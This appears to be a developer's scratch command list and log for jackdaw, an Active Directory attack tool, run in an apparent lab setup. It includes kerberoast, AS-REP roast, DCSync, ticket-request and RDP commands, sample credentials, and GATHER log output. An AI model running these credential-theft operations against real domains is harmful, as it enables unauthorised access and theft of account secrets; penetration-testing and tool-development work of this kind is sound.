python3.8 -m jackdaw --sql sqlite:////home/devel/Desktop/test.db ws


python3 -m jackdaw.nest.ws.client 'ws://127.0.0.1:5001'


python3 -m jackdaw.nest.ws.client 'ws://127.0.0.1:5001' connect listads listcreds listtargets creds targets "addcred test.corp test1 password secretpass" listcreds creds "addtarget 192.168.0.1" listtargets targets listgraphs listagents


python3 -m jackdaw.nest.ws.client 'ws://127.0.0.1:5001' connect 'addcred test.corp victim password Passw0rd!1' 'addtarget 10.10.10.2'

python3 -m jackdaw.nest.ws.client 'ws://127.0.0.1:5001' connect 'gather 1 1 1 1 1 1'

python3 -m jackdaw.nest.ws.client 'ws://127.0.0.1:5001' connect 'kerberoast 1 1 1 S-1-5-21-3448413973-1765323015-1500960949-1104'

python3 -m jackdaw.nest.ws.client 'ws://127.0.0.1:5001' connect 'asreproast 1 1 S-1-5-21-3448413973-1765323015-1500960949-1113'

python3 -m jackdaw.nest.ws.client 'ws://127.0.0.1:5001' connect 'gettgt 1 1 1'

python3 -m jackdaw.nest.ws.client 'ws://127.0.0.1:5001' connect 'gettgs 1 1 1' <<< fix this future me

python3 -m jackdaw.nest.ws.client 'ws://127.0.0.1:5001' connect 'smbdcsync 14 1 1 S-1-5-21-3448413973-1765323015-1500960949-1118'

python3 -m jackdaw.nest.ws.client 'ws://127.0.0.1:5001' connect 'rdpconnect 14 1'

# with proxy!!!
python3 -m jackdaw.nest.ws.client 'ws://127.0.0.1:5001' connect listads listcreds listtargets creds targets listagents 'smbsessions 14 1'
python3 -m jackdaw.nest.ws.client 'ws://127.0.0.1:5001' connect listads listcreds listtargets creds targets listagents 'ldapspns 14 1'
python3 -m jackdaw.nest.ws.client 'ws://127.0.0.1:5001' connect listads listcreds listtargets creds targets listagents 'ldapspns 14 1 SSPIPROXY_NTLM'




021-11-24 17:30:44,758 jackdaw.nest.ws.operator.operator INFO     OK!
INFO:jackdaw.nest.ws.operator.operator:OK!
CMD INCOMING: {"token":"4a78aa0b-a46f-42d9-8193-bd6a0febf960","cmd":"GATHER","ldap_creds":{"adid":"0","sid":"1","authtype":"NTLM"},"ldap_target":{"adid":"0","sid":"1","timeout":5},"smb_creds":{"adid":"0","sid":"1","authtype":"NTLM"},"smb_target":{"adid":"0","sid":"1","timeout":5},"kerberos_creds":{"adid":"0","sid":"1","authtype":"NTLM"},"kerberos_target":{"adid":"0","sid":"1","timeout":5},"ldap_workers":4,"smb_worker_cnt":100,"dns":{"adid":"0","sid":"1","timeout":5},"agent_id":"0","stream_data":true}
{'adid': '0', 'sid': '1', 'authtype': 'NTLM'}
{'adid': '0', 'sid': '1', 'authtype': 'NTLM'}
{'adid': '0', 'sid': '1', 'authtype': 'NTLM'}
2021-11-24 17:30:58,299 jackdaw.nest.ws.operator.operator INFO     Got command: GATHER
INFO:jackdaw.nest.ws.operator.operator:Got command: GATHER



CMD INCOMING: {"cmd": "GATHER", "token": 7, "ldap_creds": {"adid": 0, "sid": 1, "authtype": "NTLM"}, "ldap_target": {"adid": 0, "sid": 1, "timeout": 5}, "smb_creds": {"adid": 0, "sid": 1, "authtype": "NTLM"}, "smb_target": {"adid": 0, "sid": 1, "timeout": 5}, "kerberos_creds": null, "kerberos_target": null, "ldap_workers": 4, "smb_worker_cnt": 100, "dns": null, "stream_data": true, "agent_id": "0"}
{'adid': 0, 'sid': 1, 'authtype': 'NTLM'}
{'adid': 0, 'sid': 1, 'authtype': 'NTLM'}
2021-11-24 17:34:39,822 jackdaw.nest.ws.operator.operator INFO     Got command: GATHER
INFO:jackdaw.nest.ws.operator.operator:Got command: GATHER



